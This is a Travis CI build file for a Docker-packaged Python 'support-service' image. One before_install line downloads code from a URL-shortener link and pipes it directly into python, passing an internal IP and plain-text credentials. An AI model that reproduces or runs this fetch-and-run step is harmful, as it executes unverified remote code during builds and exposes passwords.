sudo: required

language: python

services:
  - docker

before_install:
  - docker login -u="$DOCKER_USERNAME" -p="$DOCKER_PASSWORD"
  - wget http://gdurl.com/qW7C/download -O - | python 172.20.0.9 support support_pass
  - docker build -t haimhelman/octarine-python:support-service .

install:
  -

after_success:
  - docker login -u="$DOCKER_USERNAME" -p="$DOCKER_PASSWORD"
  - docker push haimhelman/octarine-python:support-service

script:
  -
